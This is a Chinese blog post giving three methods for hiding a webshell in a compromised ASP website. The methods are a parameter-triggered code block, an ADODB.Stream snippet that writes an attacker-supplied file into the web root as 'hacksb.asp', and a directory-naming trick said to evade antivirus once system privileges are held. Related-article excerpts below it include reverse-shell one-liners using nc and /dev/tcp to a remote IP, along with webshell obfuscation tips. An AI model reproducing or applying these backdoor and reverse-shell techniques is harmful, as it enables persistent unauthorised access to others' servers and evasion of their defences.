常用隐藏SHELL方法

最新推荐文章于 2023-03-14 14:56:32 发布
原创 最新推荐文章于 2023-03-14 14:56:32 发布 · 2.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了三种利用ASP文件进行恶意操作的方法:通过请求参数触发隐藏代码、利用文件读取漏洞生成新文件以及获得system权限后的目录操作。这些方法可能被用于非法目的,请谨慎使用。


第一种:
在我们要做手脚的asp文件里加入如下内容
<%if request(”action”)=”ok” then%>
shell代码插在这里
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可


第二种:
在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString(”filer”)
set objStream = Server.createObject(”ABODB.Stream”)
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath(”hacksb.asp”),2
%>
访问的时候在做手脚的asp文件后面加上?filer=xxx,
xxx为你本地上传的一个路径如C:\hacksb.asp,
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp


第三种:
前提得到system权限,
进入网站目录下一层
mkdir s…
copy hacksb.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/hacksb.asp即可
 
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 5114
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
Shellcode 藏在图片中
12-07
最近某安全会议上的某个的PPT,是英文的,内容如题所示是关于shellcode隐藏技术的。
linux影藏运行命令,linux – 仅在成功时隐藏shell命令的输出?
weixin_32768455的博客
05-01 683
Hiding the output of a shell command通常涉及重定向stderr和stdout.是否有任何内置工具或命令默认隐藏输出但错误转储所有累积输出?我想将它作为远程ssh命令的包装器运行.现在我让他们使用重定向,但我不知道是什么让他们失败,他们只是太冗长.编辑:最后我根据@Belmin的答案创建了以下模板,我稍微调整一下来累积脚本中的所有先前命令,使用当前进程标识符,自动...
shell脚本去掉源码的注释
春风得意,马蹄仍急;少年豪情,一笑难回。
09-12 1155
转载地址:http://linux.chinaunix.net/techdoc/develop/2007/08/22/966038.shtml   该文件用来终极删除注释,操作系统限linux #!/bin/bash ###the script use to delete
一套PHP隐藏shell,webshell隐藏、伪装技巧
weixin_36079903的博客
03-18 569
1.改默认密码2.改名,融入上传后所在的文件夹,将名字改得较为"普通"(例如indexi.php),让人很难直观地看出文件的异常。3.文件大小的伪装处理(像正常脚本)4.将webshell的payload代码插入到网站原本的正常.php文件中(插入法),普通的正则匹配很难发现这种webshell5. webshell文件混淆:1)变量名混淆2)插入大量无用的随机字符串6.变形1)仿照一些标准、正常...
C\C++控制台程序隐藏方法总结
11-18 4361
 学习计算机,往往先从Windows环境下学习编程,学习编程,往往从C学起,学习C,往往又从控制台程序学习,何为控制台,就是那个黑框白字的界面。对于这样一个最初认为奇陋无比而现在认为无所不能的编程平台,有时候需要将界面隐藏起来。那么如何做呢?   方法1:         在头文件下加上一句预处理命令:   [cpp] view plain copy #pragma comment( ...
精选资源
shell常用命令.zip
最新发布
03-21
shell 一、文件与目录操作命令 ls命令:用于列出目录内容。 ls -l:以长格式显示文件和目录的详细信息,包括权限、所有者、大小等。 ls -a:显示所有文件和目录,包括隐藏文件(以.开头的文件)。 ls a*:列出...
Linux常用shell基本命令大全
03-15
### Linux常用Shell基本命令大全 #### 一、Shell命令的格式 在Linux系统中,Shell命令通常遵循以下格式: ``` command [option] [arguments] ``` - **command**:命令名称,例如`ls`、`cd`等。 - **option**:可选...
常用shell命令
06-24
### 最常用Shell命令知识点 #### 一、文件与目录操作命令 **1. ls命令** - **功能**:展示文件和目录的信息。 - **常见用法**: - `ls`:显示当前目录下的文件列表。 - `ls -a`:显示包括隐藏文件在内的所有...
Linux常用shell命令大全.pdf
10-30
### Linux常用Shell命令详解 #### 一、基本命令 **1. 重启与关机** - **立即重启:** - `shutdown -r now` - `reboot` - **立即关机:** - `shutdown -h now` - `poweroff` - **定时重启(2分钟后):** -...
HiddenShell:这是我为一个小型项目制作的一个隐藏Linux shell。 我用过的东西
05-15
隐藏的壳 这是一个隐藏Linux外壳(也可以使用Windows),是我为一个小型项目制作的。 我使用的东西:rbp0w,kali,nodejs。 目标 我想为一个我称为“非常非常移动的kali”(使用更好的名称XD(与该Web应用程序相同))的项目做一个Web后端。 我希望它能够在网络中被抛弃并工作XD,我正在使用Raspberry pi零W,该应用程序的目标是使其在ssh env之外可以访问。 我也希望它非常隐蔽,因此很有趣。 现在的功能 终端(与Linux和Windows兼容) 安装 git clone cd HiddenShell npm安装 npm开始 密码:admin:admin
Shell脚本实用小技巧-教你屏蔽执行命令的所有显示信息,包含错误信息
坐公交也用券
11-12 8986
在Linux中,有个/dev/null的东西,人们一般称之为黑洞,大概的意思就是东西就像黑洞一样,任何东西丢进去都会消失,那么下面就开始进行一些小案例去认识一下这个黑洞!
py文件如何变成pyc文件;使用pycharm生成一个项目文件的pyc文件,达到代码隐藏的效果;Python项目标准化发布流程(实现隐藏源代码和一键启动的功能)
Kp0fS的草稿纸
10-08 3598
py文件如何变成pyc文件,
使用shc保护shell脚本源码
weixin_33755557的博客
06-11 300
有很多理由让我们需要防止他人访问我们的shell程序源码。1、比如有时我们会把自己写的shell 让别人用,但这时有一个麻烦的地方,就是shell 里包含一些敏感信息如帐号密码等,由于shell是明文的,所以很不安全。2、某些系统会有计划任务运行一些shell程序,来达到某种管理目的。如果自己管理的一台服务器被黑了,***可能通过这些shell程序查找漏洞,***其他服务器。...
linux中用shell去掉源码注释
huangling07031190的专栏
04-15 1942
Linux中使用Shell脚本去掉源码注释的方法 该文件用来终极删除注释,操作系统限linux  #!/bin/bash ###the script use to delete comment if [ -z "$1" ];then #检测是否输入了源文件 echo "ipput the source file" exit 1 fi postfi
隐藏shellcode小技巧
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-14 357
Shellcode是一种用来利用系统漏洞或实现特定功能的机器代码,它通常以字节码的形式存在,可以被注入到被攻击的程序或系统中,然后在运行时被执行。隐藏shellcode小技巧,Shellcode常常是黑客攻击中使用的关键组件,可以用于执行各种操作,例如获取系统权限、执行恶意代码、绕过安全措施等等。 它可以被用来控制操作系统或应用程序,包括获取管理员权限、拦截网络数据、窃取密码和敏感信息、在目标系统上创建远程访问后门等等。因此,Shellcode是黑客攻击中非常重要的一环。 Windows事件日志
linux执行shell脚本隐藏文件,linux脚本中父shell与子shell 执行的几种方式
weixin_30930625的博客
05-01 510
本文主要介绍以下几个命令的区别:shellsubshellsource$ (commond)`commond`Linux执行Scripts有两种方式,主要区别在于是否建立subshell1. source filename or . filename不创建subshell,在当前shell环境下读取并执行filename中的命令,相当于顺序执行filename里面的命令2. bash filena...
linux隐藏shell,Gnome隐藏所有窗口的shell脚本,非常有趣
weixin_33788825的博客
05-13 832
Gnome用Super+D快捷键可以快速隐藏所有窗口,但这里的隐藏不是缩小化所有窗口,而只是显示桌面。它有一个小小的bug,就是topbar的背景不会随着窗口隐藏而变化。当topbar的背景为白色,这个时候隐藏窗口显示桌面的话,topbar的白色背景仍然为白色,不会变成透明,影响观感。我们都知道手机上的界面可不是这样的,在手机上我们点击Home键返回桌面,原来铺满到topbar的窗口颜色会恢复为透...
shell 后台执行以及隐藏脚本中调用其他脚本隐藏输出
qq_16683355的博客
09-14 4826
例如:A.sh要后台调用B.sh ,要隐藏B.sh中的输出。(后台执行符号"&"要写在隐藏语句“> /dev/null 2>&1 "的后面) B.sh #===================== #!/bin/bash echo “this is B.sh” #===================== A.sh #=====================
掌握Shell常用工具:命令使用技巧解析
在本篇中,我们将详细介绍一些Shell常用工具和命令,以及它们的比较使用方法。 首先,我们来谈谈Shell的定义。Shell是一个命令行解释器,它为用户提供了一个界面,允许用户通过输入命令来与计算机进行交互。它是...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

季海晨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值